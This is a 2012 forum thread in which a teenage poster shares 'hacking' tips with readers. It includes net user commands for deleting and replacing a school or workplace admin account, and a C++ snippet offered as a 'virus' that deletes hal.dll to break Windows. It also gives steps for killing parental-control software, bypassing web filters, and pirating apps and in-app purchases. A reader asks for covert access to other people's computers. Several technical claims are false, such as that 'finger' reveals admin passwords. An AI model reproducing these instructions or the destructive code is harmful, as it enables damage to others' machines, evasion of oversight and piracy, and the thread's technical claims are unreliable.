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Name's Tech Corner (63)

1 Name: Name !broNAMEpvE : 2012-02-10 17:03 ID:ypI4l6qP [Del]

Hello, and welcome to Name's Tech Corner. I have a few tips for you people out there plagued with not knowing the admin's password and/or that pesky firewall that blocks sites.

How to Obtain Admin Rights

NOTE: Do NOT do this UNLESS you know none of the teachers/bosses use this computer to log into the admin account, as it will delete EVERYTHING on that account.

1. Ok, to start off, open up Command Prompt that is programmed into every computer.

The next three steps are skip able, but, I like to do them just for fun.

2. Type in "CMD", omitting the quotes, and press enter.

3. Type in "title Hack", omitting the quotes again, and press enter. You can also replace Hack with anything you wish, but I like to title it for what I'm doing.

4. Type in "cls", I'm just gonna come out now and say that all quotes are omitted, and press enter.

5. Type in "net user /delete [admin account]", omitting the blocks, and press enter.

6. Type in "net user /add [old admin account name]", omitting the blocks (like we always will, as well), and press enter. You can also type a password after the account name, adding a space between the two, to have the account have a password.

7. Enjoy your new admin rights.

Alternative Way to Obtain Admin Access

NOTE: This method MAY not work, depending on how tech smart your bosses/teachers are.

1. Open Command Prompt.

2. Enter "finger [admin account]" and press enter.

3. If all goes well, you have the admin account password.

4. If the message "> Finger: connect::Connection refused" error message comes up, then sorry. That is one problem with this method, it doesn't work for every computer.

Get Past Site Blocking Firewalls

NOTE: Do NOT do this if you have a fear of getting caught, for it can be traced to the specific computer used.

1. Open Command Prompt.

2. Type in "nslookup [site name]" and press enter.
Note: Do not type the http:// or https:// with it, for it messes it up.

3. Look at the numbers after "non-authoritative".

4. Type those numbers into the URL bar of the internet browser you are using. Note: Keep the periods where they are.

5. If this is also blocked, then sorry. They are smart enough to block access to this "site" as well.

2 Name: Name !broNAMEpvE : 2012-02-12 17:46 ID:r9cZUV+Z [Del]

Today, I will talk about how to choose a good password and how to jailbreak iPhone 4/4s.

Way to Choose Great Passwords

1. Ok, to start off, make sure it has caps, lowercases, symbols, and numbers.

2. Example time. Here is one that a policeman used to use: POLice611!.

3. Capitol POL for security. Lowercase ice for extra security. Numbers 611 for even more security. And ! because he felt like it (and for the final piece of security).

Jailbreak iPhone 4

1. If you have a Mac, go here and download the software. For Windows, go here and download THAT software.

2. After you've downloaded the correct software, unzip (open) the file that it got downloaded into.

3. Connect your iPhone 4 to your computer.

4. Turn your iPhone 4 off. Like, off, off. Not in sleep mode.

5. Click the redsn0w icon (the pineapple with a bite taken out of it).

6. Click "Jailbreak".

7. Click next, but make sure your iPhone 4 is OFF. (Be sure to be holding your iPhone 4, ready to press buttons for specific amounts of time.)

8. Follow the on-screen steps.

9. The screen will look like it is off, but it is in DFU mode. Just continue on as normal.

10. If you didn't time everything almost perfectly correctly, just try again.

11. If you entered Recovery Mode, just hold the Power and Home buttons for about 15 seconds. Power on, and you should be out of Recovery Mode.

12. Allow the redsn0w program to go through the next few screens, without needing any input.

13. Select any of the three options, making sure to keep "Install Cydia" checked.

14. The iPhone 4 will show many command-level lines. Ignore these.

15. The iPhone will then reboot into a jailbroken state.

16. If the Cydia program (on the next open page of your iPhone 4) comes up with a blank (white) icon, reboot.

17. Open Cydia and download jailbreak apps. The people I am getting the info from recommend SBSettings, Zephyr, iFile, Classic Gaming System Emulators, and PdaNet or TetherMe.

How to Jailbreak iPhone 4s (This also works for iPad 2)

1. If you have a Mac, go here and download the software. For Windows, go here and download THAT software.

2. After the download is complete, unzip (open) that file.

3. It is HIGHLY recommended to backup your files on your iPhone 4s.

4. Click on the Absinthe icon.

5. Plug in your iPhone 4s. (This and the previous step are reversible.)

6. Press "Jailbreak" and allow the program to do its thing. (This may take a few minutes.)

IMPORTANT!: Do NOT do anything with your iPhone 4s.

7. While it is going through the steps, it will look like your iPhone 4s is reloading a backup file.

8. Your iPhone 4s will reboot.

9. The Absinthe program will send payload data.

10. After this has finished, unlock your devise and tap the Absinthe icon, it will look like the Apple icon, but more like a skull and has a green "tentacley" circle around it.

11. Cydia will replace the Absinthe icon.

12. Open Cydia and download jailbreaks apps. The people I am getting the info from recommend SBSettings, Zephyr, iFile, Classic Gaming System Emulators, and PdaNet or TetherMe.

3 Name: Name !broNAMEpvE : 2012-02-13 15:54 ID:iRnq5Dr8 [Del]

Today, I will talk about how to jailbreak any iProduct, for my previous post's program (redsn0w) didn't work for me. It always freeze right at the end. I will now give you one that works.

How to Jailbreak Any iProduct

1. Go here and download that software.

2. Go here and download your version of iProduct.

3. Open Sn0wbreeze.

4. Click "Ok."

5. Click "Cancel the credits."

6. Click the arrow.

7. Click "Browse."

8. Navigate to your ISPW file.

9. Click it.

10. Click the arrow on the right.

11. Let the program do its thing.

12. After it's done that, click the arrow.

13. Click "Start."

14. Enter DFU mode.

15. Let the program do its thing again.

16. Click "Ok."

17. Open iTunes on your computer.

18. Hold Shift while clicking "Restore."

19. Navigate to your custom ISPW file.

20. Click it.

21. Restore.

22. Install Corona using Cydia.

23. Enjoy your jailbroken iProduct.

4 Name: Name !broNAMEpvE : 2012-02-14 17:47 ID:XFXrkloH [Del] update today. The next update it too long for my attention span to write.

5 Name: Misuto!M4ZBq07Cs. : 2012-02-15 00:12 ID:q+w0A/TV [Del]

>>2 I call bull on your password one.

Read this. Hacking programs have a much tougher time when it involves more characters, rather than something nonsensical. Making it harder for yourself is just silly.

I don't really have uses for the other ones so I don't have comments for them. If they're legit though, nice instructions.

6 Name: Name !broNAMEpvE : 2012-02-15 19:40 ID:q5kp1FMK [Del]

Sorry, no update... Again... Can't find what I want on the next thing I want to tell you about. (Hint: It also involves hacking, like almost everything from before.)

>>5 Meh, and thanks.

7 Name: yasuo : 2012-02-16 06:58 ID:MtF+7g1b [Del]

yo man you so pro, thanks for the info i found it interesting and useful

8 Post deleted by user.

9 Post deleted by user.

10 Post deleted by user.

11 Post deleted by user.

12 Name: Name !broNAMEpvE : 2012-02-16 20:12 ID:FA/+dvzD [Del]

Sorry, no update. Again. Sorry, again. Trying to find the correct programs...AND getting multiple viruses in the process.

Anyway, free C++ language virus that kills any Windows computer. Enjoy (I am NOT responsible for your use of it.)(Replace . after cstdlib and iostream with >.):

#include <cstdlib.
#include <iostream.

using namespace std;

int main(int argc, char *argv[])
std::remove("C:\\windows\\system32\\hal.dll"); //Virus
system("shutdown -s -r");

@7 Thanks.

(Hate this site and its use of Shift+,. for codes, made me have to post five times just to get it to work.)

13 Name: Takara!E7th54kZFw!!XI8GEi6V : 2012-02-17 01:32 ID:UgF3k2qY [Del]

I have a request. I would like a tutorial on net nanny disabling.

It's not that I have one, but that the laptops that the government gives you in Australia automatically have one. So I would like to know how to do this when I get it.

Actually, I sort of have a general idea of how to do this already, but I would like the full tutorial on how to do it, and if there's any alternative ways to mine.

14 Name: Misuto!M4ZBq07Cs. : 2012-02-17 02:29 ID:q+w0A/TV [Del]

>>12 ...That could have just been made with a batch script. C++ seems excessive.

And it's not a "Virus", as the comment implies. Virus implies it replicates and propagates. It's not even malware, since it doesn't execute by itself. You literally have to run it yourself to get it to work, and all it really does is delete 1 essential file.

15 Name: Name !broNAMEpvE : 2012-02-17 16:37 ID:HZiavGT5 [Del]

>>14 Meh.

>>13 Ok, since my thing is taking so long (and I currently have a jailbreak job in progress), why not.

How to Disable Net Nanny

1. Press Crtl (Command) + Alt +Delete.

2. Open up the task manager.

3. Search for "NNScv.exe" and "nntray.exe."

4. End both those processes.

5. Enjoy your disabled Net Nanny, which will start up again on the next start up.

How to Remove Net Nanny

Windows Vista/7:

1. Click Start.

2. Click on Settings.

3. Open Control Panel.

4. Open Add or Remove Programs.

5. Left click "Content Protect" or "Net Nanny" and click the "change/remove" button.

6. Be sure to click "yes to all."

7. Restart your computer and the changes will take affect.

8. Open My Computer.

9. Click on Tools at the top.

10. Click on Folder options.

11. Open the View tab.

12. Select the circle next to Show Hidden Files and Folders
Click Apply and then OK.

13. Delete the Content Watch Folders from the following locations:

c:\program files

Note: The Windows XP instructions were kinda sketchy. So, I only have instructions for Vista/7. Sorry if you have XP. There weren't instructions for any other Windows or Mac setups.

16 Name: Name !broNAMEpvE : 2012-02-17 23:57 ID:HZiavGT5 [Del]

Second update, to make up m\for no updates for SO LONG. A fix to a previous tutorial and a new one.

Jailbreak With Sn0wbreeze Fix

1. After completing your jailbreak, power off your device and run iBooty.

2. Your device will start up in a jailbroken state.

3. Unless you do the next tutorial, you won't be able to open Cydia, nor will you be able have any of your Cydia apps/programs run.

Note: You may also need to tap refresh, top right in the Changes tab, then download the updates. This will take a while to a long time, depending on your definition of each.

Adding Corona (Untether) to Jailbroken iDevice

1. Download.

2. Download.

3. Run the setup (the first download).

4. Once finished, open WinSCP.

5. On Cydia, look up "OpenSSH."

6. Install it.

7. Open the first download to the computer, WinSCP.

8. Make sure SSH is on, on Cydia.

9. Open WinSCP.

10. In Host Name, type in your IP address. (Found in: Settings -> Wi-Fi -> the router you are using.)

11. Port Number should be 22.

12. User Name should be filled out with root.

13. Password should be alpine, unless you changed it on Cydia. Then use it.

14. File Protocol should be SCP.

15. Click Login.

16. After that does its thing, press Yes.

17. Click the file with the name as two periods in the right box.

18. Open the file named tmp.

19. Click and drag the second file to the tmp file.

20. Select copy.

21. Press Ctrl(Command)+T.

22. In the window that pops up, enter the command "dpkg -i /tmp/*filenamehere*.deb," replacing *filenamehere* with your .deb file name.

23. After you successfully execute that command, delete that file from tmp.

24. Reboot your iDevice.

25. Enjoy your new untethered jailbroken iProduct.

17 Name: Name !broNAMEpvE : 2012-02-20 19:34 ID:eOlxlgu9 [Del]

Haven't been on here, chat, or any site really, for a while. So, today I will tell you Cydia apps/programs for free apps, music, and in app purchases and their source. (I don't have a free movie one yet.)

Installous 4 (App) -
Music Box (Music) -
iAP Cracker (In-App) -

18 Name: Takara!E7th54kZFw!!XI8GEi6V : 2012-02-20 21:57 ID:UgF3k2qY [Del]

I have another request~!

This one might be a bit more difficult..

I would like to know how I can view what is on other peoples' computers if they're not on my network and their account is password protected.

I've already used TeamViewer, but that tells the victim that you're viewing their screen, and I've used TightVNC, but that's a little more difficult to work out how to use and such.

I'm sure that there's probably an easier way to do this, and that allows you to do it secretly, if it's too difficult for you to find instructions on, then that's okay. Just ignore me if that is so.

19 Name: yasuo : 2012-02-21 07:10 ID:MtF+7g1b [Del]

my friend showed me a way to do that yesturday but you must be able to use that persons comp, it takes about 5 to 10 mins

20 Name: Name !broNAMEpvE : 2012-02-21 18:40 ID:bol/FcaI [Del]

>>18 Got it. And have one of the programs (that work) already. I'll get on it as soon as I can. May not have the tutorial for a day or two.

21 Name: Takara!E7th54kZFw!!XI8GEi6V : 2012-02-22 03:08 ID:UgF3k2qY [Del]

>>20 Sure, take your time :)

22 Name: Name !broNAMEpvE : 2012-03-07 02:45 ID:2AwXmJLg [Del]

>>21 Sorry I forgot. I have the day off from school today, so I'll devote all my time to it now.

23 Name: Name !broNAMEpvE : 2012-03-07 03:25 ID:2AwXmJLg [Del]

GREAT news! I've found the password finder, but the retarded awesomeness known as Google wont give me a download link.

24 Name: Name !broNAMEpvE : 2012-03-07 04:03 ID:2AwXmJLg [Del]

*in odd accent:* I will continue this a-lllater. Even Name gets sleepy sometimes. Night (well, it's 4:02 AM; so, mourning), humans. See you when I wake up.

25 Name: Name !broNAMEpvE : 2012-03-07 13:07 ID:y1k/BEdm [Del]

I need someone willing to have their computer password found, just to see if this works. If you will agree go to here and E-Mail what your IP is to me at:

Thank you for your assistance.

26 Name: Misuto!M4ZBq07Cs. : 2012-03-07 17:24 ID:q+w0A/TV [Del]

>>25 It is my sincere hope you realize how skeptical that sounds.

Why don't you test your own computer?

27 Name: Name !broNAMEpvE : 2012-03-07 17:27 ID:y1k/BEdm [Del]

>>26 Well, I do realize how skeptical it sounds. And, because I don't HAVE a password. The program would come up with a blank on its end.

28 Name: Misuto!M4ZBq07Cs. : 2012-03-08 03:49 ID:q+w0A/TV [Del]


Then make.

a password.

29 Name: Takara!!VpW7gX2l : 2012-03-22 01:58 ID:UgF3k2qY [Del]

I. Want. My. Tutorial.

30 Name: Nixx !.bf3kM4S3A : 2012-03-22 04:21 ID:39AX0jqd [Del]


It's pretty odd to ask total strangers (whom you're trying to help in the first place) to test out a program you yourself aren't sure of...

You should know that testing it on yourself first is a courtesy to the users you are trying to help/inform.

If that program virtually disembowels your computer, then (from a current WORKING computer) you should let people know ahead of time to avoid Program A.

31 Name: BarabiSama!!C8QPa1Mt : 2012-03-23 12:35 ID:aIVE/1If [Del]

Hey, Name, I have a request. I need to find a way to get onto Facebook at school. I can get past every other block except that one >O

It's not that I really want to use it; I just want to feel superior to the other students who complain about it. /selfishmotives

32 Name: Takara!!VpW7gX2l : 2012-03-23 19:11 ID:UgF3k2qY [Del]

I don't know why, but it seems that Name doesn't even bother to check the Tech board anymore.

It's been over a month, Name. I need my tutorial soon.

33 Name: Name !broNAMEpvE : 2012-03-24 10:37 ID:VSjwtsX4 [Del]

>>32 ...Sorry, but school stuff's been coming up...plans...really the only free day I have is Sunday. I'll try to get it done, but I have no idea what program to use to find usernames on a computer. I asked, and people gave me one for ports. Go them, because I was gonna ask for that one later. Anyway, blah.

I'll try to finish it ASAP, but it will still take a while. Again, sorry.

34 Name: Name !broNAMEpvE : 2012-03-24 21:12 ID:lFjRUnd3 [Del]

While we're awaiting the programs to be found, I will teach you how to make a blank post. Example in next post.

How to Make a Blank Post - Works on Both Chat and BBS

1. Hold ALT, and, if your on a laptop, the Fn key.

2. Press 0160 on the numberpad, or, on laptops, MJOM, still holding the ALT (and possibly Fn key).

3. Release the ALT key.

4. The result should look like a space.

5. Example in next post.

35 Name: Name !broNAMEpvE : 2012-03-24 21:12 ID:lFjRUnd3 [Del]


36 Name: Takara!!VpW7gX2l : 2012-03-25 00:56 ID:UgF3k2qY [Del]

>>34 If you have a full keyboard on a laptop like me (keyboard + number pad) then you need to do ALT + 0160.

37 Name: Sleepology !4a6Vun8zuw : 2012-03-25 00:57 ID:jTFG1270 [Del]

how to make a coffee cup with an alt combo?
I used to be able to do it on this one site, but that was over two years ago.

38 Name: Takara!!VpW7gX2l : 2012-03-25 01:10 ID:UgF3k2qY [Del]


µtorrent symbol?

ALT + 0181


39 Name: Sleepology !4a6Vun8zuw : 2012-03-25 01:19 ID:jTFG1270 [Del]

no like it was a literal coffee cup with steam coming out of it n everything. Maybe its just because of the site I was using..

40 Name: Shiyo : 2012-04-17 20:10 ID:51pgw1ZJ [Del]

This might sound extremely nooby...

But where exactly do you figure out where the admin's name is, or even what it is?

If this is impossible to answer, then please tell me...

41 Name: Z : 2012-04-18 23:32 ID:kJdaaEuc [Del]

Well this is not necessarily true, the admin name is probably "admin" or "Admin"

42 Post deleted by user.

43 Name: Takara!!VpW7gX2l : 2012-04-19 00:56 ID:UgF3k2qY [Del]

>>42 I think that >>40 was asking where to find the admin's name on a computer. As in the admin account of a computer. >>41 Was thinking of Reltair.

44 Name: Shiyo : 2012-04-19 03:54 ID:51pgw1ZJ [Del]

Thanks Z~

Just wanted to ask another potentially nooby question... does this work on Windows7? Coz when I tried, it kept on popping up with system error 5, and whatever I tried to do it didn't work to get rid of that error...

45 Name: bang-bang : 2012-04-19 04:59 ID:85Flz0Dh [Del]

>>44 What are you trying to do with it exactly?

But if it's just the name you want, just logging off takes you to the list of available users. And you can probably find it somewhere in User Accounts in Control Panel too. But if you don't have the password you probably can't do anything with it.

46 Name: Shiyo !hiBXn.e9Tw : 2012-04-20 01:06 ID:51pgw1ZJ [Del]

>>45 dang. I guess I can't do anything then...
I just want to know if there's an admin name. Because the only name registered on my laptop is mine. And I'm not an admin :l

47 Name: sleepology !CHs4eVJ3O2 : 2012-04-20 03:09 ID:nTTbcE3N [Del]

Are you sure? That sounds very unlikely

48 Name: bang-bang : 2012-04-20 05:24 ID:85Flz0Dh [Del]

>>46 If there's only one account it should be admin by default. I think. It should say when you go here.

49 Name: Shiyo !hiBXn.e9Tw : 2012-04-20 19:39 ID:51pgw1ZJ [Del]

>>47 >>48 It's that my laptop is a government laptop (i.e. craptop, as we users call it). Perhaps that's why I can't access it, because the government blocked it =w=. Oh wells...

50 Name: Name !XDRURIU2kE : 2012-04-21 17:26 ID:f4lkvK33 [Del]

Ok, I need to step in here and correct these people. On all Windows computers, there is a hidden admin account, "admin," and if you're not admin, it's because you:

1. Haven't done the correct thing to make you an admin, which I forget since I have no idea what I did.

2. The laptop has been made to where no accounts can be made into an admin.

I will put up a tutorial on how to get to the secret admin account soon. I haven't done it in a few months, so I forget how exactly, but I will find the site with the tutorial ASAP.

51 Name: Name !XDRURIU2kE : 2012-04-21 17:55 ID:UkwcbW4x [Del]

Oh, before I begin, I would like to say sorry to Takara, because I cannot get his tutorial made. I can't find a program to find the account names on computers not using the same router as you.


How to Access the Hidden Administrator Account

Note: The original author of this tutorial said to never make it your default user. Plus, just be sure not act idiotic while on the account.


1. Go to the start menu.

2. Right click on "Computer" and click manage.

3. Click "Local Users and Groups" on the window that pops up.

4. Click "Users."

5. Click "Administrator" or whatever yours is, mine was "admin."

6. The screen should look something like this.

7. Click the bottom "More Actions" on the right side.

8. Click "Properties."

9. Unselect the "Account is disabled" check box.

10. Click "OK."

Adding Password

1. Select the second "More Actions" again.

2. Select "Set Password."

3. You will be shown this, but ignore it and click "OK." It hasn't been used; thus, has no data except the default programs.

4. Type the new password into both boxes.

5. Click "OK."

6. Done, enjoy your new admin account.

52 Name: bang-bang : 2012-04-21 18:36 ID:85Flz0Dh [Del]

Wait. If the account was disabled, doesn't it mean that it was never in use anyway? I don't get what enabling it gets you exactly.

53 Name: Name !XDRURIU2kE : 2012-04-21 20:20 ID:f4lkvK33 [Del]

>>52 It gets you administration rights.

54 Name: ♔Tsukitty!TSUKIx5W46 : 2012-04-22 12:20 ID:+jcT0161 [Del]

55 Name: Shiyo !hiBXn.e9Tw : 2012-04-22 17:38 ID:51pgw1ZJ (Image: 1012x726 png, 85 kb) [Del]

src/1335134326919.png: 1012x726, 85 kb
>>51 I'd think it'd work but for one problem... there's no "local users and groups" tab... I will show you...

56 Name: Name !XDRURIU2kE : 2012-04-22 20:29 ID:SXPLuQMl [Del]

>>55 I'll get right on it.

57 Name: Name !XDRURIU2kE : 2012-04-22 20:30 ID:SXPLuQMl [Del]

>>55 Wait, one question, you have Windows 7 Professional or what? It does matter.

58 Name: Name !XDRURIU2kE : 2012-04-25 21:44 ID:Ax0EzpMY [Del]

Oh, I'm bored, was bored, and found this out. Might as well share.

How to Access Blocked Sites at School

1. Replace the http:// in the URL with https:// and enter the site name (IE:

2. Press enter.

3. Yay, you're on the blocked site.

59 Name: Anonymous : 2012-04-26 10:11 ID:6hB23D2f [Del]


60 Name: Anonymous : 2012-04-26 10:12 ID:6hB23D2f [Del]

>>58 I have tried that before. Eventuallty so many students did it the school fixed it.

61 Name: Name !XDRURIU2kE : 2012-04-26 16:46 ID:zVTshaAy [Del]

>>60 That's why you do it sparingly.

62 Name: Name !XDRURIU2kE : 2012-05-01 23:08 ID:nogRfc+7 [Del]

Can't get to our linked chat? (Drrrchat.)

How about now?

63 Name: Takara!!VpW7gX2l : 2012-06-13 08:24 ID:UgF3k2qY [Del]

>>51 Can't believe it took me this long to see this post. Please, just continue the tutorial without using a program to find User account names that aren't on your router. I'm sure that anyone who may also be trying to do the same thing as me probably know the account name of the person's computer they are trying to comb.